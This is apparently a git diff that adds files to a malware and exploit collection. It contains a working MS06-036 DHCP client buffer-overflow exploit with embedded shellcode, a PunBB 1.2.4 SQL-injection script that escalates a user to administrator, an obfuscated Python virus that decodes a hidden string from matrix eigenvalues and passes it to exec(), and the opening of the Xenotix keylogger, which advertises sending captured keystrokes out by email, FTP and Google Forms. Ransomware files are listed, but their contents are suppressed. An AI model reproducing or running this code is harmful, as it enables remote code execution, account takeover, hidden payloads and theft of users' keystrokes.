import sys, os
|
||||
|
||||
sys.path.append("pydhcplib")
|
||||
|
||||
from scapy import *
|
||||
|
||||
from pydhcplib.dhcp_packet import *
|
||||
from pydhcplib.dhcp_network import *
|
||||
from pydhcplib.type_strlist import *
|
||||
from pydhcplib.type_ipv4 import *
|
||||
from pydhcplib.type_hw_addr import *
|
||||
|
||||
inet_face = "vmnet8"
|
||||
|
||||
default_ip = "10.31.33.7"
|
||||
|
||||
# user bl4ck/bl4ck
|
||||
# this exits via Thread (so thta we kill the dhcp thread in services.exe
|
||||
#
|
||||
# this means if services doesn't crash, it was a successful exploit
|
||||
#
|
||||
scode = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13" \
|
||||
"\x43\x32\xa5\x83\xeb\xfc\xe2\xf4\xef\xab\x76\xa5\x13\x43\xb9\xe0" \
|
||||
"\x2f\xc8\x4e\xa0\x6b\x42\xdd\x2e\x5c\x5b\xb9\xfa\x33\x42\xd9\xec" \
|
||||
"\x98\x77\xb9\xa4\xfd\x72\xf2\x3c\xbf\xc7\xf2\xd1\x14\x82\xf8\xa8" \
|
||||
"\x12\x81\xd9\x51\x28\x17\x16\xa1\x66\xa6\xb9\xfa\x37\x42\xd9\xc3" \
|
||||
"\x98\x4f\x79\x2e\x4c\x5f\x33\x4e\x98\x5f\xb9\xa4\xf8\xca\x6e\x81" \
|
||||
"\x17\x80\x03\x65\x77\xc8\x72\x95\x96\x83\x4a\xa9\x98\x03\x3e\x2e" \
|
||||
"\x63\x5f\x9f\x2e\x7b\x4b\xd9\xac\x98\xc3\x82\xa5\x13\x43\xb9\xcd" \
|
||||
"\x2f\x1c\x03\x53\x73\x15\xbb\x5d\x90\x83\x49\xf5\x7b\xac\xfc\x45" \
|
||||
"\x73\x2b\xaa\x5b\x99\x4d\x65\x5a\xf4\x20\x5f\xc1\x3d\x26\x4a\xc0" \
|
||||
"\x33\x6c\x51\x85\x7d\x26\x46\x85\x66\x30\x57\xd7\x33\x21\x5e\x91" \
|
||||
"\x70\x28\x12\xc7\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x63\x14\x83" \
|
||||
"\x33\x2d\x57\xd1\x33\x2f\x5d\xc6\x72\x2f\x55\xd7\x7c\x36\x42\x85" \
|
||||
"\x52\x27\x5f\xcc\x7d\x2a\x41\xd1\x61\x22\x46\xca\x61\x30\x12\xc7" \
|
||||
"\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x43\x32\xa5"
|
||||
|
||||
|
||||
|
||||
netopt = {'client_listen_port':"68",
|
||||
'server_listen_port':"67",
|
||||
'listen_address':"0.0.0.0"}
|
||||
|
||||
|
||||
def substr(i,o,off):
|
||||
begin=i[:off]
|
||||
end=i[off+len(o):]
|
||||
ret=begin+o+end
|
||||
return ret
|
||||
|
||||
def io(i):
|
||||
str=""
|
||||
a=chr(i % 256)
|
||||
i=i >> 8
|
||||
b=chr(i % 256)
|
||||
i=i >> 8
|
||||
c=chr(i % 256)
|
||||
i=i >> 8
|
||||
d=chr(i % 256)
|
||||
|
||||
str+="%c%c%c%c" % (a,b,c,d)
|
||||
|
||||
return str
|
||||
|
||||
class Server(DhcpServer):
|
||||
def __init__(self, options):
|
||||
DhcpServer.__init__(self,options["listen_address"],
|
||||
options["client_listen_port"],
|
||||
options["server_listen_port"])
|
||||
|
||||
def HandleDhcpDiscover(self, packet):
|
||||
my_reqip = ''
|
||||
|
||||
my_reqip = default_ip
|
||||
|
||||
sid_i = my_reqip.rfind(".")
|
||||
server_ip = my_reqip[0:sid_i] + ".254"
|
||||
|
||||
our_ip = my_reqip[0:sid_i] + ".2"
|
||||
|
||||
mymac = hwmac(packet.GetHardwareAddress()).str()
|
||||
print "** Received discover from %s (%s)" % (mymac,my_reqip)
|
||||
|
||||
mpacket = DhcpPacket()
|
||||
mpacket.CreateDhcpOfferPacketFrom(packet)
|
||||
mpacket.SetOption("dhcp_message_type",[2])
|
||||
mpacket.SetOption("yiaddr", ipv4(my_reqip).list())
|
||||
mpacket.SetOption("siaddr", ipv4(server_ip).list())
|
||||
mpacket.SetOption("ip_address_lease_time",[0,0,7,8])
|
||||
mpacket.SetOption("flags",[0,0])
|
||||
mpacket.SetOption("server_identifier", ipv4(server_ip).list())
|
||||
mpacket.SetOption("subnet_mask", ipv4("255.255.255.0").list())
|
||||
mpacket.SetOption("domain_name_server", ipv4(our_ip).list())
|
||||
mpacket.SetOption("router",ipv4(our_ip).list())
|
||||
|
||||
mpacket.SetOption("domain_name",strlist( ( "N" * 255 )).list())
|
||||
|
||||
append = "\xfa\xff" + ( "\x90" * 0xff )
|
||||
append = "\xfa\xff" + ( "\x90" * 0xff )
|
||||
append = "\xfa\xff" + ( "\x90" * 0xff )
|
||||
append = "\xfa\xff" + ( "\x90" * 0xff )
|
||||
append = "\xfa\xff" + ( "\x90" * 0xff )
|
||||
|
||||
p = Ether(dst=mymac,src=get_if_hwaddr(inet_face))/IP(src=server_ip,dst="255.255.255.255",ttl=16)/UDP(sport=67,dport=68)/mpacket.EncodePacket('')
|
||||
|
||||
print "** Sending DHCP Offer Packet to %s from %s" % (my_reqip,server_ip)
|
||||
sendp(p, iface=inet_face, verbose=False)
|
||||
|
||||
def HandleDhcpRequest(self, packet):
|
||||
|
||||
|
||||
ip = packet.GetOption("request_ip_address")
|
||||
sid = packet.GetOption("server_identifier")
|
||||
ciaddr = packet.GetOption("ciaddr")
|
||||
my_reqip = ''
|
||||
try:
|
||||
data = packet.options_data['request_ip_address']
|
||||
for i in range(0,len(data),4) :
|
||||
if len(data[i:i+4]) == 4 :
|
||||
my_reqip += ipv4(data[i:i+4]).str()
|
||||
except:
|
||||
my_reqip = default_ip
|
||||
|
||||
mymac = hwmac(packet.GetHardwareAddress()).str()
|
||||
print "** Received request from %s (%s)" % (my_reqip,mymac)
|
||||
sid_i = my_reqip.rfind(".")
|
||||
server_ip = my_reqip[0:sid_i] + ".254"
|
||||
|
||||
our_ip = my_reqip[0:sid_i] + ".2"
|
||||
|
||||
mypacket = DhcpPacket()
|
||||
mypacket.CreateDhcpAckPacketFrom(packet)
|
||||
mypacket.SetOption("yiaddr", ipv4(my_reqip).list())
|
||||
|
||||
dumbstr = "\x90" * 0xFF
|
||||
|
||||
# we're looking for a jmp/call ebx ?! or landing in our codespace
|
||||
# directly
|
||||
|
||||
# C5 converts to 253C
|
||||
# BB = 2557
|
||||
# AA = 00AC
|
||||
# DD = 258C
|
||||
# EE = 03B5
|
||||
# 88 = 00D6
|
||||
# 99 = 00EA
|
||||
# F3 = 2591
|
||||
# B0 = 2264
|
||||
# 8F = 00c5
|
||||
|
||||
eipstr = ( "\xB9\x0b" * ( 254 / 2) ) + "\x64"
|
||||
#eipstr = "C" * 0xFF
|
||||
|
||||
|
||||
payload = "\x42" * 0xFF
|
||||
payload = substr(payload, scode, 1)
|
||||
|
||||
|
||||
## find location in heap to ret2
|
||||
# find offset & append as many "\x26\x6e\x43\x6e"
|
||||
# to increment ebx to a non trashed location (since ebx points to our code)
|
||||
# then push ebx \x53 and \xc4 (retn)
|
||||
#
|
||||
# we're looking for a pop+pop+ret or a jmp/call ebx to return to our
|
||||
# unicode filtered input
|
||||
# note it must be iwthin the bounds of 0x0000**** - 0x0070****
|
||||
# or 0x22***** <-- wont help us
|
||||
|
||||
append = "\x0f\xff" + ( "\x90" * 0xff )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( eipstr )
|
||||
append += "\xfa\xff" + ( eipstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( payload[0:254]) + "\x00"
|
||||
|
||||
print "Length of our attack: %r" % len(append)
|
||||
|
||||
eth = Ether(dst=mymac,src=get_if_hwaddr(inet_face))
|
||||
p = fragment(IP(src=server_ip,dst=my_reqip,ttl=16)/UDP(sport=67,dport=68)/mypacket.EncodePacket(append), 1024)
|
||||
print "** Sending DHCP ACK response (len: %r) to %s from %s" % (len(append), my_reqip,server_ip)
|
||||
for i in p:
|
||||
sendp(eth/i, iface=inet_face, verbose=False)
|
||||
|
||||
def HandleDhcpDecline(self, packet):
|
||||
return
|
||||
#print "** Dhcp Declined"
|
||||
#packet.PrintHeaders()
|
||||
#packet.PrintOptions()
|
||||
|
||||
def HandleDhcpRelease(self, packet):
|
||||
return
|
||||
#packet.PrintHeaders()
|
||||
#packet.PrintOptions()
|
||||
|
||||
def HandleDhcpInform(self, packet):
|
||||
return
|
||||
#packet.PrintHeaders()
|
||||
#packet.PrintOptions()
|
||||
|
||||
|
||||
|
||||
print "[BL4CK] - MS06-036 DHCP Client Domain Name Overflow"
|
||||
print "\t by redsand@blacksecurity.org"
|
||||
print "Usage: %s [interface] [forced request ip]" % sys.argv[0]
|
||||
print ""
|
||||
|
||||
|
||||
if len(sys.argv) > 1:
|
||||
inet_face = sys.argv[1]
|
||||
|
||||
if len(sys.argv) > 2:
|
||||
default_ip = sys.argv[2]
|
||||
|
||||
print "Listening for client requests:\n"
|
||||
print "Listening on interface: %s" % inet_face
|
||||
print "Using default address: %s" % default_ip
|
||||
|
||||
server = Server(netopt)
|
||||
|
||||
while True :
|
||||
server.GetNextDhcpPacket()
|
130
Python/Exploit.Python.PunBB.a
Normal file
130
Python/Exploit.Python.PunBB.a
Normal file
@ -0,0 +1,130 @@
|
||||
#!/usr/bin/python
|
||||
#######################################################################
|
||||
# _ _ _ _ ___ _ _ ___
|
||||
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
|
||||
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
|
||||
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
|
||||
#
|
||||
#######################################################################
|
||||
# Proof of concept code from the Hardened-PHP Project
|
||||
#######################################################################
|
||||
#
|
||||
# -= PunBB 1.2.4 =-
|
||||
# change_email SQL injection exploit
|
||||
#
|
||||
# user-supplied data within the database is still user-supplied data
|
||||
#
|
||||
#######################################################################
|
||||
|
||||
import urllib
|
||||
import getopt
|
||||
import sys
|
||||
import string
|
||||
|
||||
__argv__ = sys.argv
|
||||
|
||||
def banner():
|
||||
print "PunBB 1.2.4 - change_email SQL injection exploit"
|
||||
print "Copyright (C) 2005 Hardened-PHP Project\n"
|
||||
|
||||
def usage():
|
||||
banner()
|
||||
print "Usage:\n"
|
||||
print " $ ./punbb_change_email.py [options]\n"
|
||||
print " -h http_url url of the punBB forum to exploit"
|
||||
print " f.e. http://www.forum.net/punBB/"
|
||||
print " -u username punBB forum useraccount"
|
||||
print " -p password punBB forum userpassword"
|
||||
print " -e email email address where the admin leve activation email is sent"
|
||||
print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails"
|
||||
print ""
|
||||
sys.exit(-1)
|
||||
|
||||
def main():
|
||||
try:
|
||||
opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
|
||||
except getopt.GetoptError:
|
||||
usage()
|
||||
|
||||
if len(__argv__) < 10:
|
||||
usage()
|
||||
|
||||
username = None
|
||||
password = None
|
||||
email = None
|
||||
domain = None
|
||||
host = None
|
||||
for o, arg in opts:
|
||||
if o == "-h":
|
||||
host = arg
|
||||
if o == "-u":
|
||||
username = arg
|
||||
if o == "-p":
|
||||
password = arg
|
||||
if o == "-e":
|
||||
email = arg
|
||||
if o == "-d":
|
||||
domain = arg
|
||||
|
||||
# Printout banner
|
||||
banner()
|
||||
|
||||
# Check if everything we need is there
|
||||
if host == None:
|
||||
print "[-] need a host to connect to"
|
||||
sys.exit(-1)
|
||||
if username == None:
|
||||
print "[-] username needed to continue"
|
||||
sys.exit(-1)
|
||||
if password == None:
|
||||
print "[-] password needed to continue"
|
||||
sys.exit(-1)
|
||||
if email == None:
|
||||
print "[-] email address needed to continue"
|
||||
sys.exit(-1)
|
||||
if domain == None:
|
||||
print "[-] catch all domain needed to continue"
|
||||
sys.exit(-1)
|
||||
|
||||
# Retrive cookie
|
||||
params = {
|
||||
'req_username' : username,
|
||||
'req_password' : password,
|
||||
'form_sent' : 1
|
||||
}
|
||||
|
||||
wclient = urllib.URLopener()
|
||||
|
||||
print "[+] Connecting to retrieve cookie"
|
||||
|
||||
req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
|
||||
info = req.info()
|
||||
if 'set-cookie' not in info:
|
||||
print "[-] Unable to retrieve cookie... something is wrong"
|
||||
sys.exit(-3)
|
||||
cookie = info['set-cookie']
|
||||
cookie = cookie[:string.find(cookie, ';')]
|
||||
print "[+] Cookie found - extracting user_id"
|
||||
user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
|
||||
print "[+] User-ID: %d" % (int(user_id))
|
||||
wclient.addheader('Cookie', cookie);
|
||||
|
||||
email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
|
||||
append = 'group_id=\'1'
|
||||
email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain
|
||||
|
||||
params = {
|
||||
'req_new_email' : email,
|
||||
'form_sent' : 1
|
||||
}
|
||||
|
||||
print "[+] Connecting to request change email"
|
||||
req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params))
|
||||
|
||||
print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
|
||||
|
||||
|
208
Python/Kirk_ransomware.py
Normal file
208
Python/Kirk_ransomware.py
Normal file
File diff suppressed because one or more lines are too long
220
Python/RedKeeper-ransomware_source.py
Normal file
220
Python/RedKeeper-ransomware_source.py
Normal file
File diff suppressed because one or more lines are too long
BIN
Python/Scrypt.7z
Normal file
BIN
Python/Scrypt.7z
Normal file
Binary file not shown.
BIN
Python/Sin.7z
Normal file
BIN
Python/Sin.7z
Normal file
Binary file not shown.
98
Python/Virus.Python.Agent.c
Normal file
98
Python/Virus.Python.Agent.c
Normal file
@ -0,0 +1,98 @@
|
||||
def root3(num):
|
||||
fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j
|
||||
fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j
|
||||
a=num**(1/3.0)
|
||||
b=a*fak1
|
||||
c=a*fak2
|
||||
return([a,b,c])
|
||||
|
||||
def getPQ(a,b,c):
|
||||
p = b-((a**2)/3.0)
|
||||
q = c + ((2*(a**3)-9*a*b)/27.0)
|
||||
return([p,q])
|
||||
|
||||
def getU(p,q):
|
||||
u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0)
|
||||
return(root3(u3))
|
||||
|
||||
def getLambda(a,p,u):
|
||||
if u[0] == 0:
|
||||
L0=u[0] - a/3.0
|
||||
else:
|
||||
L0=u[0] - p/(3.0*u[0]) - a/3.0
|
||||
|
||||
if u[1] == 0:
|
||||
L1=-a/3.0
|
||||
else:
|
||||
L1=u[1] - p/(3.0*u[1]) - a/3.0
|
||||
|
||||
if u[2] == 0:
|
||||
L2=-a/3.0
|
||||
else:
|
||||
L2=u[2] - p/(3.0*u[2]) - a/3.0
|
||||
|
||||
return(L0,L1,L2)
|
||||
|
||||
def getABC(mtx):
|
||||
a=-(mtx[0]+mtx[4]+mtx[8])
|
||||
b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6]
|
||||
c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6]
|
||||
return([a,b,c])
|
||||
|
||||
def eigenvalues(mtx):
|
||||
ABC=getABC(mtx)
|
||||
PQ=getPQ(ABC[0],ABC[1],ABC[2])
|
||||
U=getU(PQ[0],PQ[1])
|
||||
L=getLambda(ABC[0],PQ[0],U)
|
||||
return(L)
|
||||
|
||||
def getstring(M):
|
||||
str=''
|
||||
for c in range(len(M)):
|
||||
mLD=eigenvalues(M[c])
|
||||
for i in range(len(mLD)+1):
|
||||
for n in range(len(mLD)):
|
||||
if round(mLD[n].imag)==i:
|
||||
str+=chr(int(round(mLD[n].real)))
|
||||
return(str)
|
||||
|
||||
M=[]
|
||||
M.append([(113.01385812+5.43930508534j),(1.00380746157-8.31965051919j),(0.801104731078+0.936588237838j),(3.54083344964+0.95424311335j),(108.978932614-0.625324609788j),(0.972664728193+3.21561313492j),(-1.96068431273+4.58178510931j),(3.38000675384-5.19874167231j),(109.007209265+1.18601952445j),])
|
||||
M.append([(63.0988642714+6.73474244088j),(38.7957438546+7.29183564711j),(34.4164174161-43.9985000655j),(-3.42189631605-2.2839106126j),(113.592704397+4.68789276089j),(3.78797602794+2.84593141297j),(11.8086451552+20.4309988015j),(-3.08750519397-21.3451644199j),(88.308431332-5.42263520176j),])
|
||||
M.append([(104.406855517-9.51624929923j),(0.968098716657+10.247486874j),(-10.7284625243-8.95847099578j),(12.9139324019-13.3095003388j),(96.7571541203+10.1186269916j),(7.53204087547-16.3313451185j),(-9.47853339226+0.528078467428j),(6.9494984576+1.54492254096j),(101.835990363+5.39762230766j),])
|
||||
M.append([(117.007583423+0.42259290212j),(10.4289001938+0.0037209199438j),(7.38888705374+0.935638896508j),(7.48115014303-3.41289258877j),(109.069280503-0.755948319674j),(3.24478449812-2.16750354816j),(-5.74964216381+9.69321702672j),(-7.26693352937+5.36042347147j),(97.9231360734+6.33335541755j),])
|
||||
M.append([(110.186416521-0.282612884393j),(-2.46184250953-5.55813797363j),(4.65778281951-4.75979618248j),(1.2659069035+12.6581511208j),(107.886755805+0.474822088624j),(3.77155367287+6.88744471253j),(-7.42510092378+1.80348448129j),(3.14192118127+4.23989806091j),(97.9268276743+5.80779079577j),])
|
||||
M.append([(72.2140022769+61.3183653042j),(-18.8737409148-15.7060435241j),(58.3392636255+30.6485277395j),(-67.1552054341+56.3911897282j),(98.6385647787-16.4179748155j),(56.9733296013+58.133872392j),(45.8159400299-18.7587055968j),(4.2035312554+13.3668119287j),(90.1474329444-38.9003904887j),])
|
||||
M.append([(104.049507734+5.75582437702j),(-8.72678394019-5.7668384277j),(-11.0728012113-0.32217237915j),(-6.87057321217+21.3939122634j),(103.760022178-2.99256708802j),(-6.18499776219-12.1551478727j),(-8.55296803681+54.31807084j),(-58.3551932758-7.47435960792j),(39.190470088+3.236742711j),])
|
||||
M.append([(76.9430409827-13.830066127j),(25.1319832458+9.77882938313j),(23.6549471992+11.4951304553j),(-3.81624310702-25.6964065375j),(108.730230203+24.1623701839j),(5.05322782415+22.5769539708j),(-39.5767673149+3.75005714549j),(33.4962700542-11.2140580554j),(135.326728814-4.33230405689j),])
|
||||
M.append([(65.3705381002+24.3275637724j),(-23.2408507633-33.1948135285j),(-44.3749218976-10.1563451877j),(30.8389091728+74.8930292425j),(41.3652574764+15.0556813223j),(-36.9319552246+53.5371650042j),(-24.3971696191-65.7465103691j),(47.0569815727+0.905906700125j),(136.264204423-33.3832450947j),])
|
||||
M.append([(103.879170415-6.73853523077j),(-20.1941478753-16.2138368074j),(1.27422168444+35.9444148563j),(-3.28016774977+2.63824729836j),(104.873906957+14.1425509676j),(14.7081936915-15.7091034424j),(1.23585470553+0.462230318846j),(3.99583062229+0.00177486657705j),(104.246922628-1.40401573681j),])
|
||||
M.append([(109.670502533+0.403141520484j),(7.62437688862-0.469520922423j),(-3.8130361216-0.375627871282j),(14.0602377266+3.46852117946j),(92.5012496763+2.28293319899j),(2.21516616594-3.96314049044j),(1.15517757889+16.0475697982j),(-14.3244254327-19.1761387797j),(119.82824779+3.31392528053j),])
|
||||
M.append([(103.630364939+4.54863042641j),(7.34206767122+2.30334575024j),(3.93792103721-1.42468650631j),(5.28646514805-8.78486038728j),(98.758713343+3.91722107348j),(-5.40281247446+4.3533159006j),(14.5436715774+5.03112629715j),(-8.19448665625-12.6529950692j),(97.6109217181-2.46585149989j),])
|
||||
M.append([(104.391701773-1.28789346598j),(0.228987611687+5.26905457024j),(-1.3673287265-2.9154578731j),(-5.19199921432-5.86731771378j),(107.927827685+4.0817978047j),(5.19694717434-2.72187536151j),(-3.43168840953-7.95022707391j),(6.04669461661+4.18498345448j),(108.680470541+3.20609566129j),])
|
||||
M.append([(88.1645520027+10.9191618534j),(9.74598033305+18.068953036j),(-0.113455388879-5.11740033423j),(-34.909679646-39.8975995576j),(43.7694619926-2.4494446771j),(-12.7606575537-15.2531928161j),(-8.99329464816-45.2183653921j),(-56.5464769405-7.27118850532j),(111.065986005-2.46971717635j),])
|
||||
M.append([(87.8436008855+37.2629509457j),(-51.9477703666-28.3330817872j),(-20.1947489139-12.0838625073j),(-15.6555897585+36.5732828063j),(47.3314962468-32.3154414398j),(-21.1146466098-12.552594695j),(0.498644271988+5.19403644322j),(-9.1206559221-3.17935277945j),(95.8249028677+1.05249049408j),])
|
||||
M.append([(111.146805692+4.22816251299j),(2.00324359806+10.5843665889j),(-2.76026670136+5.20361787029j),(-0.985087506932-1.29558792278j),(97.2988804122+4.77489490019j),(-2.81701992434-5.43193976106j),(4.97185962129-5.27998630615j),(-1.43241652008-10.0386034583j),(117.554313896-3.00305741318j),])
|
||||
M.append([(-21.059624269+69.4352827883j),(47.7772465004-121.415108205j),(120.935434939-10.9319876972j),(2.32311751035+7.32736096727j),(93.8129822074-6.8056664753j),(0.0754000989682-4.74426213079j),(-48.3307205418+97.4666346448j),(-20.0521590244-119.910441446j),(173.246642062-56.629616313j),])
|
||||
M.append([(94.7688077375+18.270605105j),(-50.3580988311-8.3225498517j),(30.4393219197+24.5256489646j),(-6.85270305911+5.89181789918j),(82.1382476449-5.73463476433j),(4.80123601494+10.7017896355j),(6.61864679123-4.83167627161j),(13.778199697+8.88223295844j),(98.0929446176-6.53597034071j),])
|
||||
M.append([(223.253418937+5.95739588995j),(-77.8544386917+92.0828034681j),(-66.0443657955-165.557230081j),(20.0015446384+12.4300989707j),(73.3785528053+6.58501047921j),(4.85014684391-40.1196037084j),(43.2420823142-86.4244985314j),(35.1454404794+94.4180400311j),(-44.6319717425-6.54240636915j),])
|
||||
M.append([(41.0142081682+23.2692063962j),(-10.6086219501+12.7493725956j),(-46.7302597052+49.2056004608j),(51.637072693-8.01584922166j),(110.718041509-6.48634894989j),(46.8309243128-32.6164121693j),(-12.3478982429-19.6604596911j),(-6.48744349525-3.43877091281j),(81.2677503229-10.7828574463j),])
|
||||
M.append([(109.877621466+12.9575670925j),(-0.778140589321+10.5307376923j),(13.6006972337-3.82251684732j),(-1.48970463341-8.29533978213j),(102.357458012-1.86290951708j),(-5.23584582302-2.25840002211j),(7.6099988791-4.90702093254j),(5.7456354155-0.0460450739799j),(99.7649205225-5.0946575754j),])
|
||||
M.append([(94.7045035062-25.6229683407j),(-18.2391253369+22.7937631609j),(-29.0905604048-7.19037097502j),(-23.0583403669-39.2866397524j),(84.4266794832+39.7464274999j),(-46.0279000559-20.4386101794j),(-20.7027086938-29.2221245384j),(-18.6498115923+31.300573431j),(76.8688170106-8.1234591592j),])
|
||||
M.append([(105.670108346-3.91057638934j),(-3.64697546254+1.44567755708j),(-3.71735073048-12.7439262806j),(-7.99274261168+0.34948217567j),(109.08995481+3.47786624051j),(-10.2704859141+6.0654065736j),(-0.194287756539+3.86197876037j),(-1.44643001225-2.3985124903j),(102.239936845+6.43271014883j),])
|
||||
M.append([(122.580470378-14.4341507316j),(-27.9438628782+10.3163428973j),(-15.959467946-25.3057176316j),(31.5540729618-32.8694065023j),(46.8175228377-21.2447861623j),(6.09279603678-75.1153578148j),(-22.2133570254+12.3894404294j),(34.6467245111+24.5784878294j),(99.6020067838+41.6789368939j),])
|
||||
M.append([(118.85308691+82.9440945768j),(-36.7483143231+71.5868022216j),(-14.0602241989+48.8832603538j),(-132.891784217-67.3064515175j),(33.3702442097-118.126219615j),(-62.7605460516-60.0857139837j),(12.2710245926+63.6543411513j),(-20.456384219+60.6722531119j),(107.77666888+41.1821250382j),])
|
||||
M.append([(106.436935258+0.928988682079j),(3.93779429639+6.68647382008j),(-0.0389643589009+10.2941097267j),(2.02626855767+0.877555321617j),(99.4113275962+4.72209193461j),(-3.18653446253+4.32872182213j),(-0.943084208786-6.41108105498j),(2.98095284974-3.31170222485j),(105.151737146+0.348919383309j),])
|
||||
M.append([(89.8393869858+35.1156535265j),(-108.098660853-84.0641370429j),(-93.5592844814-144.096505433j),(-1.52256241496+37.1313230361j),(-62.3311003044-67.6198151922j),(-149.146935766-152.098017315j),(-11.6934149927-25.8642378853j),(102.202629088+0.396174315178j),(221.491713319+38.5041616656j),])
|
||||
M.append([(184.999581386-303.410690053j),(218.314145844-155.474761163j),(262.880172627+230.115099676j),(-538.767619748-98.455473687j),(-203.66848676-357.747658577j),(359.059170049-493.880837704j),(469.81304818-382.628798149j),(531.60552896+5.35571698513j),(261.668905373+667.15834863j),])
|
||||
M.append([(124.484426976-4.79265261306j),(-1.90039577969+15.2806731306j),(-18.7190751541+1.5572252021j),(27.8626383998+26.0405223995j),(79.3599559898+13.1200825749j),(-18.4075679284-18.5560150143j),(-12.4597152173+7.93055072715j),(-2.36047405658-8.7957114854j),(108.155617034-2.32742996182j),])
|
||||
M.append([(92.6459559853-1.61276841314j),(-2.0775597689+6.17372014973j),(1.58885077997+44.1526032096j),(-10.0586572313-15.3981052444j),(102.608682641+6.90841217943j),(-28.4935227638+37.3104003402j),(0.952674935262+1.69014692933j),(0.176304072703+1.37540601544j),(115.745361374+0.704356233709j),])
|
||||
M.append([(110.352225966+15.0065645213j),(1.42965534543-13.4014323936j),(-10.7448834991+0.0219689393547j),(57.5347841678-26.5000549214j),(55.3558840653-19.5118382831j),(-15.349876293+32.2392737263j),(-13.599951644-29.5406287949j),(-11.8306821749+21.3907330347j),(114.291889969+10.5052737619j),])
|
||||
M.append([(127.619853945+6.41616340126j),(3.62478727278-7.68008027677j),(0.124935166111-11.0775400641j),(-2.76561151013-15.0636851946j),(101.573759382+1.49058531598j),(-7.1698539994+3.47262961061j),(5.56386532794+0.856124995439j),(0.556465885654-2.13151008852j),(107.806386673-1.90674871724j),])
|
||||
M.append([(129.375564736-27.6356017879j),(130.633802405+16.6327156314j),(63.9163645123-80.5372989939j),(5.30892321897+13.7359651655j),(64.8038754853+38.8830235124j),(3.09452345512+35.5540061223j),(-17.5222898492-0.775799027654j),(-33.6207752829-55.6332905587j),(48.8205597791-5.24742172451j),])
|
||||
M.append([(128.165629995+46.851034685j),(-43.5399488716+50.0747581674j),(-46.0582844675-16.3828631231j),(-29.8868468217+65.6767553681j),(12.9446164156-2.75648494841j),(-26.6597116882-79.7372322933j),(-16.5963386111+31.3463623124j),(-47.430583864-6.87775041003j),(100.889753589-38.0945497366j),])
|
||||
M.append([(107.475753937-8.73914157279j),(-14.7370476469-12.2953925586j),(-9.0605469686-11.6014273048j),(6.78665637989-45.7250245438j),(57.0367272907-30.8464281211j),(-15.8499229947-40.2424461761j),(-49.7238750637+31.9402101387j),(6.57848208777+65.6049084414j),(77.4875187726+45.5855696939j),])
|
||||
M.append([(115.100711527+2.07929665225j),(0.41771554184-0.785257450021j),(-0.0371116950126+0.0181246287347j),(2.06862780962+1.08414962847j),(114.922123142+1.20839044412j),(0.802727678553+1.91427683396j),(0.494766249983+0.00450813801499j),(0.101233800608+0.6116084733j),(116.977165331+2.71231290364j),])
|
||||
M.append([(118.758300393-38.713436278j),(-100.033551513-21.6515062627j),(99.6928681056-5.4765076885j),(41.4635727201-48.9116687864j),(-28.8384928343+13.0342444563j),(65.3947415069-23.7200622778j),(54.9240245771+4.62648931131j),(-46.411851834-46.1306247796j),(96.0801924414+31.6791918218j),])
|
||||
myMTXcode=getstring(M)
|
||||
exec(myMTXcode)
|
210
Python/xenotix.py
Normal file
210
Python/xenotix.py
Normal file
@ -0,0 +1,210 @@
|
||||
'''
|
||||
Xenotix Python Keylogger for Windows
|
||||
====================================
|
||||
Coded By: Ajin Abraham <ajin25@gmail.com>
|
||||
Website: http://opensecurity.in/xenotix-python-keylogger-for-windows/
|
||||
GitHub: https://github.com/ajinabraham/Xenotix-Python-Keylogger
|
||||
|
||||
FEATURES
|
||||
========
|
||||
1.STORE LOGS LOCALLY
|
||||
2.SEND LOGS TO GOOGLE FORMS
|
||||
3.SEND LOGS TO EMAIL
|
||||
4.SEND LOGS TO FTP
|
||||
|
||||
MINIMUM REQUIREMENTS
|
||||
===================
|
||||
Python 2.7: http://www.python.org/getit/
|
||||
pyHook Module: http://sourceforge.net/projects/pyhook/
|
||||
pyrhoncom Module: http://sourceforge.net/projects/pywin32/
|
||||
|
||||
pyHook Module -
|
||||
Unofficial Windows Binaries for Python Extension Packages: http://www.lfd.uci.edu/~gohlke/pythonlibs/
|
||||
|
||||
|
||||
NOTE: YOU ARE FREE TO COPY,MODIFY,REUSE THE SOURCE CODE FOR EDUCATIONAL PURPOSE ONLY.
|
||||
'''
|
||||
try:
|
||||
import pythoncom, pyHook
|
||||
except:
|
||||
print "Please Install pythoncom and pyHook modules"
|
||||
exit(0)
|
||||
import os
|
||||
import sys
|
||||
import threading
|
||||
import urllib,urllib2
|
||||
import smtplib
|
||||
import ftplib
|
||||
import datetime,time
|
||||
